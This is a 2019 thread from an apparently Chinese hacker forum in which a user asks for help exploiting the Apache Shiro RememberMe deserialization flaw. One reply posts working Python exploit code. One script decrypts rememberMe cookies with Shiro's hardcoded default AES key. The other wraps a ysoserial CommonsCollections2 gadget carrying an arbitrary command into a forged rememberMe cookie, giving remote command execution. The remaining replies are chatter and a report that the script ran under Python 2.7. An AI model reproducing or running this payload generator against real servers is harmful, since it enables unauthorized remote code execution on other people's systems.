设为首页收藏本站
查看: 6102|回复: 9

请问有谁会shiro反序列化漏洞

[复制链接]
  • TA的每日心情
    慵懒
    2019-8-1 22:01
  • 签到天数: 166 天

    [LV.7]常住居民III

    发表于 2019-6-11 02:30:21 | 显示全部楼层 |阅读模式
    100威望
    深夜装了大半夜,解决了很多报错问题,最后出现这个,所以求论坛大佬帮忙解决这个问题。

    附件: 您需要 登录 才可以下载或查看,没有帐号?注册
  • TA的每日心情
    慵懒
    前天 01:34
  • 签到天数: 51 天

    [LV.5]常住居民I

    发表于 2019-6-11 04:49:03 | 显示全部楼层
    其实我也不知道怎么解决这个问题,可是我也对你的吻很感兴趣。谢谢你贴了大哥



    回复

    使用道具 举报

  • TA的每日心情
    奋斗
    2019-8-22 09:51
  • 签到天数: 28 天

    [LV.4]偶尔看看III

    发表于 2019-6-11 14:37:49 | 显示全部楼层
    序列化反序列化耶!
    回复

    使用道具 举报

  • TA的每日心情
    无聊
    4 天前
  • 签到天数: 81 天

    [LV.6]常住居民II

    发表于 2019-6-12 09:55:33 | 显示全部楼层
    # pip install pycrypto
    import sys
    import base64
    from Crypto.Cipher import AES
    def decode_rememberme_file(filename):
        with open(filename, 'rb') as fpr:
            key  =  "kPH+bIxk5D2deZiIxcaaaA=="
            mode =  AES.MODE_CBC
            IV   = b' ' * 16
            encryptor = AES.new(base64.b64decode(key), mode, IV=IV)
            remember_bin = encryptor.decrypt(fpr.read())
        return remember_bin
    if __name__ == '__main__':
        with open("/tmp/decrypt.bin", 'wb+') as fpw:
            fpw.write(decode_rememberme_file(sys.argv[1]))

    漏洞序列化的对象是 PrincipalCollection,利用脚本
    # pip install pycrypto
    import sys
    import base64
    import uuid
    from random import Random
    import subprocess
    from Crypto.Cipher import AES

    def encode_rememberme(command):
        popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.5-SNAPSHOT-all.jar', 'CommonsCollections2', command], stdout=subprocess.PIPE)
        BS   = AES.block_size
        pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
        key  =  "kPH+bIxk5D2deZiIxcaaaA=="
        mode =  AES.MODE_CBC
        iv   =  uuid.uuid4().bytes
        encryptor = AES.new(base64.b64decode(key), mode, iv)
        file_body = pad(popen.stdout.read())
        base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
        return base64_ciphertext

    if __name__ == '__main__':
        payload = encode_rememberme(sys.argv[1])   
        with open("/tmp/payload.cookie", "w") as fpw:
            print("rememberMe={}".format(payload.decode()), file=fpw)
    回复

    使用道具 举报

  • TA的每日心情
    慵懒
    2019-8-1 22:01
  • 签到天数: 166 天

    [LV.7]常住居民III

     楼主| 发表于 2019-6-12 20:03:14 | 显示全部楼层
    一直笔 发表于 2019-6-12 09:55
    # pip install pycrypto
    import sys
    import base64

    你好,我先出现的问题是Shiro RememberMe反序列化出现了问题,不是Apache Shiro 反序列化RCE漏洞。你这段话我在https://www.cnblogs.com/KevinGeorge/p/9252036.html看到过,很感谢你的回复。
    回复

    使用道具 举报

  • TA的每日心情
    慵懒
    2019-8-1 22:01
  • 签到天数: 166 天

    [LV.7]常住居民III

     楼主| 发表于 2019-6-12 20:05:39 | 显示全部楼层
    Shiro RememberMe 反序列化导致的命令执行漏洞
    回复

    使用道具 举报

  • TA的每日心情
    奋斗
    2019-8-22 09:51
  • 签到天数: 28 天

    [LV.4]偶尔看看III

    发表于 2019-6-12 21:22:20 | 显示全部楼层
    在这里应该怎么弄
    回复

    使用道具 举报

  • TA的每日心情
    开心
    7 天前
  • 签到天数: 5 天

    [LV.2]偶尔看看I

    发表于 2019-6-14 13:44:56 来自手机 | 显示全部楼层
    本帖最后由 边梓墨 于 2019-6-14 13:46 编辑

    小白路过ヽ(  ̄д ̄;)ノ
    问度娘啊,楼主?//手动滑稽
    /*不过,话说,你这100威望可真让人心动,可惜我不会解_*/
    回复

    使用道具 举报

  • TA的每日心情
    慵懒
    2019-8-1 22:01
  • 签到天数: 166 天

    [LV.7]常住居民III

     楼主| 发表于 2019-6-18 11:39:20 | 显示全部楼层
    解决了,使用pthon2.7运行即可
    回复

    使用道具 举报

  • TA的每日心情

    昨天 03:06
  • 签到天数: 86 天

    [LV.6]常住居民II

    发表于 2019-6-29 07:57:35 | 显示全部楼层
    最近这个漏洞很多。
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    关闭

    站长推荐 上一条 /1 下一条

    红盟社区--中国红客联盟 

    Processed in 0.115843 second(s), 21 queries.

    站点统计| 举报| Archiver| 手机版| 黑屋 |   

    Powered by HUC © 2001-2017 Comsenz Inc.

    手机扫我进入移动触屏客户端

    关注我们可获取更多热点资讯

    Honor accompaniments. theme macfee

    快速回复 返回顶部 返回列表